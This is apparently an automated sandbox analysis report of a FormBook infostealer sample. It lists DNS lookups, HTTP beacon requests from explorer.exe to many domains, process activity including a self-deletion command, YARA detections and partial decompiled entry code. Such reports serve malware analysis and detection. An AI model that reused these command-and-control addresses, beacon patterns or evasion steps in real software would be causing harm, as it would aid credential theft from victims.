Jul 22, 2021 17:44:25.974387884 CEST | 192.168.2.6 | 8.8.8.8 | 0x669d | Standard query (0) | www.cwdelrio.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 17:43:11.337713003 CEST | 8.8.8.8 | 192.168.2.6 | 0x1866 | No error (0) | www.aizaibali.com | | 154.88.31.204 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:14.637433052 CEST | 8.8.8.8 | 192.168.2.6 | 0xd048 | No error (0) | www.aizaibali.com | | 154.88.31.204 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:18.327318907 CEST | 8.8.8.8 | 192.168.2.6 | 0x82af | No error (0) | www.extinctionbrews.com | extinctionbrews.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:43:18.327318907 CEST | 8.8.8.8 | 192.168.2.6 | 0x82af | No error (0) | extinctionbrews.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:24.086940050 CEST | 8.8.8.8 | 192.168.2.6 | 0x64c8 | No error (0) | www.doityourselfism.com | doityourselfism.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:43:24.086940050 CEST | 8.8.8.8 | 192.168.2.6 | 0x64c8 | No error (0) | doityourselfism.com | | 169.62.77.158 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:31.679512024 CEST | 8.8.8.8 | 192.168.2.6 | 0xac29 | Server failure (2) | www.xn--vuq722jwngjre.com | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:31.749258995 CEST | 8.8.8.8 | 192.168.2.6 | 0xac29 | Server failure (2) | www.xn--vuq722jwngjre.com | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:32.341495037 CEST | 8.8.8.8 | 192.168.2.6 | 0xac29 | Server failure (2) | www.xn--vuq722jwngjre.com | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:36.758774996 CEST | 8.8.8.8 | 192.168.2.6 | 0xe600 | No error (0) | www.ecofingers.com | | 52.58.78.16 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:46.989679098 CEST | 8.8.8.8 | 192.168.2.6 | 0xef2d | No error (0) | www.invisiongc.net | invisiongc.net | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:43:46.989679098 CEST | 8.8.8.8 | 192.168.2.6 | 0xef2d | No error (0) | invisiongc.net | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:52.401670933 CEST | 8.8.8.8 | 192.168.2.6 | 0x3cef | Name error (3) | www.oikoschain.com | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:57.807579994 CEST | 8.8.8.8 | 192.168.2.6 | 0xfbfc | No error (0) | www.findfoodshop.com | | 119.59.120.26 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:03.471841097 CEST | 8.8.8.8 | 192.168.2.6 | 0xa966 | No error (0) | www.scuolatua.com | | 62.149.128.40 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:08.993699074 CEST | 8.8.8.8 | 192.168.2.6 | 0x71e5 | No error (0) | www.okinawarongnho.com | okinawarongnho.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:44:08.993699074 CEST | 8.8.8.8 | 192.168.2.6 | 0x71e5 | No error (0) | okinawarongnho.com | | 103.138.88.11 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:14.755909920 CEST | 8.8.8.8 | 192.168.2.6 | 0xf647 | No error (0) | www.jorgeporcayo.com | jorgeporcayo.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:44:14.755909920 CEST | 8.8.8.8 | 192.168.2.6 | 0xf647 | No error (0) | jorgeporcayo.com | | 162.241.62.54 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:20.523808956 CEST | 8.8.8.8 | 192.168.2.6 | 0x9ea4 | No error (0) | www.wthcoffee.com | wthcoffee.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:44:20.523808956 CEST | 8.8.8.8 | 192.168.2.6 | 0x9ea4 | No error (0) | wthcoffee.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
                                                                  Jul 22, 2021 17:44:26.063608885 CEST8.8.8.8192.168.2.60x669dName error (3)www.cwdelrio.comnonenoneA (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.extinctionbrews.com
                                                                  • www.doityourselfism.com
                                                                  • www.ecofingers.com
                                                                  • www.invisiongc.net
                                                                  • www.findfoodshop.com
                                                                  • www.scuolatua.com
                                                                  • www.okinawarongnho.com
                                                                  • www.jorgeporcayo.com

                                                                  HTTP Packets

                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  0 | 192.168.2.6 | 49748 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  Jul 22, 2021 17:43:18.792526960 CEST | 4239 | OUT | GET /dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.extinctionbrews.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:18.931600094 CEST | 4240 | IN | HTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Thu, 22 Jul 2021 15:43:18 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "60ef6789-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  1 | 192.168.2.6 | 49752 | 169.62.77.158 | 80 | C:\Windows\explorer.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  Jul 22, 2021 17:43:24.283298969 CEST | 7468 | OUT | GET /dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.doityourselfism.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:24.475476027 CEST | 7469 | IN | HTTP/1.1 302 Found
                                                                  Date: Thu, 22 Jul 2021 15:43:24 GMT
                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 mod_apreq2-20090110/2.8.0 mod_perl/2.0.11 Perl/v5.16.3
                                                                  Location: http://ww1.doityourselfism.com/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx
                                                                  Content-Length: 314
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://ww1.doityourselfism.com/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&amp;0X=C6Ah3vPx">here</a>.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  2 | 192.168.2.6 | 49753 | 52.58.78.16 | 80 | C:\Windows\explorer.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  Jul 22, 2021 17:43:36.803443909 CEST | 10370 | OUT | GET /dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.ecofingers.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:36.847250938 CEST | 10370 | IN | HTTP/1.1 410 Gone
                                                                  Server: openresty
                                                                  Date: Thu, 22 Jul 2021 15:41:50 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='5; url=http://www.ecofingers.com/' />a </head>9 <body>3a You are being redirected to http://www.ecofingers.coma </body>8</html>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  3 | 192.168.2.6 | 49758 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  Jul 22, 2021 17:43:47.034261942 CEST | 10389 | OUT | GET /dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.invisiongc.net
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:47.172086954 CEST | 10390 | IN | HTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Thu, 22 Jul 2021 15:43:47 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "60f790d8-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  4 | 192.168.2.6 | 49760 | 119.59.120.26 | 80 | C:\Windows\explorer.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  Jul 22, 2021 17:43:58.054111004 CEST | 10418 | OUT | GET /dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.findfoodshop.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:58.298029900 CEST | 10419 | IN | HTTP/1.1 301 Moved Permanently
                                                                  Date: Thu, 22 Jul 2021 15:43:58 GMT
                                                                  Server: Apache/2
                                                                  Location: https://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx
                                                                  Content-Length: 341
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&amp;0X=C6Ah3vPx">here</a>.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  5 | 192.168.2.6 | 49761 | 62.149.128.40 | 80 | C:\Windows\explorer.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  Jul 22, 2021 17:44:03.542511940 CEST | 10420 | OUT | GET /dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.scuolatua.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:44:03.612077951 CEST | 10421 | IN | HTTP/1.1 404 Not Found
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Server: Microsoft-IIS/8.5
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Thu, 22 Jul 2021 15:44:03 GMT
                                                                  Connection: close
                                                                  Content-Length: 5045
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px
                                                                  Jul 22, 2021 17:44:03.612123013 CEST | 10423 | IN | Data Raw: 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74
                                                                  Data Ascii: 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:
                                                                  Jul 22, 2021 17:44:03.612144947 CEST | 10424 | IN | Data Raw: 63 6f 6e 74 61 69 6e 65 72 22 3e 20 0a 20 20 3c 68 33 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c
                                                                  Data Ascii: container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely cause
                                                                  Jul 22, 2021 17:44:03.612165928 CEST | 10425 | IN | Data Raw: 3b 26 6e 62 73 70 3b 53 74 61 74 69 63 46 69 6c 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 45 72 72 6f 72 20 43 6f 64 65 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 30 78 38 30
                                                                  Data Ascii: ;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Request


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  6 | 192.168.2.6 | 49762 | 103.138.88.11 | 80 | C:\Windows\explorer.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  Jul 22, 2021 17:44:09.256103992 CEST | 10427 | OUT | GET /dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.okinawarongnho.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:44:09.556632996 CEST | 10427 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Thu, 22 Jul 2021 15:42:19 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Content-Length: 203
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dy8g/ was not found on this server.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  7 | 192.168.2.6 | 49763 | 162.241.62.54 | 80 | C:\Windows\explorer.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  Jul 22, 2021 17:44:14.927139997 CEST | 10428 | OUT | GET /dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.jorgeporcayo.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:44:15.720453024 CEST | 10429 | IN | HTTP/1.1 200 OK
                                                                  Date: Thu, 22 Jul 2021 15:44:15 GMT
                                                                  Server: Apache
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  Retry-After: 86400
                                                                  Upgrade: h2,h2c
                                                                  Connection: Upgrade, close
                                                                  Vary: Accept-Encoding
                                                                  Accept-Ranges: none
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Ascii: 91c<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title> is under construction</title> <meta name="description" content="Movimiento personal y social" /> <meta name="generator" content="Free UnderConstructionPage plugin for WordPress"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,900"> <link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3.83" type="text/css"><link rel="stylesheet" href="htt
                                                                  Jul 22, 2021 17:44:15.720489979 CEST10431INData Raw: 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 66 6f 6e
                                                                  Data Ascii: p://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=3.83" type="text/css"><link rel="icon" sizes="128x128" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/i
                                                                  Jul 22, 2021 17:44:15.720509052 CEST10431INData Raw: 3e 0d 0a 0d 0a
                                                                  Data Ascii: >
                                                                  Jul 22, 2021 17:44:15.730438948 CEST10431INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Memory Usage

                                                                  High Level Behavior Distribution

                                                                  Behavior

                                                                  System Behavior

                                                                  General

                                                                  Start time:17:42:10
                                                                  Start date:22/07/2021
                                                                  Path:C:\Users\user\Desktop\v8kZUFgdD4.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\v8kZUFgdD4.exe'
                                                                  Imagebase:0x400000
                                                                  File size:188889 bytes
                                                                  MD5 hash:57F3AE2842FFB5CEEA386D0B97A52818
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:17:42:10
                                                                  Start date:22/07/2021
                                                                  Path:C:\Users\user\Desktop\v8kZUFgdD4.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\v8kZUFgdD4.exe'
                                                                  Imagebase:0x400000
                                                                  File size:188889 bytes
                                                                  MD5 hash:57F3AE2842FFB5CEEA386D0B97A52818
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:17:42:15
                                                                  Start date:22/07/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0x7ff6f22f0000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:17:42:34
                                                                  Start date:22/07/2021
                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                  Imagebase:0x13e0000
                                                                  File size:29184 bytes
                                                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:17:42:38
                                                                  Start date:22/07/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
                                                                  Imagebase:0x2a0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:17:42:39
                                                                  Start date:22/07/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff61de10000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis


                                                                    Executed Functions

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021C07B4
                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 021C07DE
                                                                    • ReadFile.KERNELBASE(00000000,00000000,021C026C,?,00000000), ref: 021C07F5
                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 021C0817
                                                                    • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,021C01AE,7FDFFF66), ref: 021C088A
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 021C0895
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,021C01AE), ref: 021C08E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.341132647.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                    • String ID:
                                                                    • API String ID: 656311269-0
                                                                    • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                                                    • Instruction ID: 30d1bf957c64212f48b7ff9d38df64586d26949a4771151be86ba3feeb2b79e5
                                                                    • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                                                    • Instruction Fuzzy Hash: A2619039E44708EBCB10DFA4C884BAEB7B6AF5C710F258069E515EB390E7749D41CB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 73%
                                                                    			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                                    				CHAR* _v8;
